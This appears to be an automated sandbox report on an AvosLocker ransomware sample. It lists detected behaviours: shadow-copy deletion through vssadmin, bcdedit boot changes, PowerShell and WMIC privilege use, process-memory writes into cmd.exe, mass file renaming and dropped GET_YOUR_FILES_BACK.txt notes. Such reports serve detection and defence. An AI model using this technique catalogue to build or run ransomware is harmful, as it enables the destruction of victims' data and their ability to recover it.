Malware Analysis Report

2024-10-16 03:28

Sample ID 240529-hycdjsed9t
Target 00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f
SHA256 00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f
Tags
avoslocker defense_evasion evasion execution impact ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f

Threat Level: Known bad

The file 00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f was found to be: Known bad.

Malicious Activity Summary

avoslocker defense_evasion evasion execution impact ransomware

Avoslocker Ransomware

Deletes shadow copies

Renames multiple (8462) files with added filename extension

Modifies boot configuration data using bcdedit

Renames multiple (10383) files with added filename extension

Drops desktop.ini file(s)

Enumerates connected drives

Sets desktop wallpaper using registry

Drops file in Program Files directory

Unsigned PE

Command and Scripting Interpreter: PowerShell

Interacts with shadow copies

Uses Volume Shadow Copy service COM API

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-29 07:08

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-29 07:08

Reported

2024-05-29 07:10

Platform

win7-20240221-en

Max time kernel

121s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A

Renames multiple (10383) files with added filename extension

ransomware

Drops desktop.ini file(s)

Description | Indicator | Process | Target
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A

Enumerates connected drives

Description | Indicator | Process | Target
File opened (read-only) | \??\Z: | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A

Sets desktop wallpaper using registry

ransomware
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2090100087.png" | C:\Windows\system32\reg.exe | N/A

Drops file in Program Files directory

Description | Indicator | Process | Target
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Americana\TAB_OFF.GIF | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_s.png | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\vlc.mo | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\org-openide-filesystems_ja.jar | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File created | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\MSACCESS_K_COL.HXK | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00037_.GIF | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD19695_.WMF | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0212685.WMF | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File created | C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.filesystem_1.4.100.v20140514-1614.jar | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File created | C:\Program Files\Internet Explorer\it-IT\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Slipstream.xml | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TR00494_.WMF | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File created | C:\Program Files (x86)\Common Files\microsoft shared\TextConv\de-DE\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_windy.png | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\vlc.mo | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File created | C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\gadget.xml | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGREPFRM.DPV | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\HEADING.JPG | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR22F.GIF | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Oasis.css | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400005.PNG | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File created | C:\Program Files\Microsoft Games\Purble Place\fr-FR\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_ja.jar | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\.eclipseproduct | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\sr.pak | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\Stationery\ShadesOfBlue.jpg | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\fr-FR\calendar.html | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\1047x576_91n92.png | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR17F.GIF | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN00010_.WMF | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File created | C:\Program Files (x86)\Common Files\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\square_settings.png | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\highlight.png | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-4.png | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime\TAB_ON.GIF | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10267_.GIF | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00656_.WMF | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\it-IT\slideShow.html | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\it-IT\js\settings.js | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_zh_CN.jar | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\circleround_videoinset.png | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\mainscroll.png | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext-disable.png | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\POWERPNT.DEV_K_COL.HXK | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0215709.WMF | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01236U.BMP | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CATALOG.DPV | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL096.XML | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01162_.WMF | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099165.JPG | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\ja-JP\js\cpu.js | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files\Java\jre7\lib\zi\Etc\GMT+7 | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\css\settings.css | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\Fancy\PLUS.GIF | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\library.js | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files\Windows Media Player\en-US\mpvis.dll.mui | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.bidi_0.10.0.v20130327-1442.jar | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Interacts with shadow copies

ransomware
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeTakeOwnershipPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2088 wrote to memory of 1788 | N/A | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1788 | N/A | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1788 | N/A | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1788 | N/A | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1048 | N/A | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1048 | N/A | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1048 | N/A | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1048 | N/A | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1804 | N/A | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1804 | N/A | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1804 | N/A | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1804 | N/A | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1912 | N/A | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1912 | N/A | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1912 | N/A | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1912 | N/A | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1676 | N/A | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1676 | N/A | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | C:\Windows\system32\cmd.exe
